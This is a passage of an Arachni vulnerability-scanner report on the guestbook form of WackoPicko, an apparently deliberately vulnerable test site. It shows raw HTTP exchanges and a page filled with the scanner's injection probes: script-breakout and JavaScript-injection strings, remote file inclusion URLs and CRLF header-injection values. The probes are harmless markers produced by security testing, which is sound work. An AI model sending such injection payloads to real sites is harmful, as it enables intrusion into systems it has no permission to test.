_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name" /><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit" /> </form> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
input
comment
using
POST
at
http://192.168.0.26/WackoPicko/guestbook/
pointing to
http://192.168.0.26/WackoPicko/guestbook.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> </br> <input type="text" name="name"> </input> <br> </br> Comment: <br> </br> <textarea id="comment-box" name="comment"> </textarea> <br> </br> <input type="submit" value="Submit"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/guestbook/ | http://192.168.0.26/WackoPicko/guestbook.php |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 0.640342 | load |
page
|
|
||
| 1 | 0.099554 | request |
http://192.168.0.26/WackoPicko/guestbook.php |
|
||
| 2 | 0.099813 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
POST /WackoPicko/guestbook.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72 Content-Length: 111 Content-Type: application/x-www-form-urlencoded comment=1%3B%0Awindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink%28%29%3B&name=arachni_name
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1599
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
<p> - by arachni_name </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
<p class="comment">1</p>
<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by 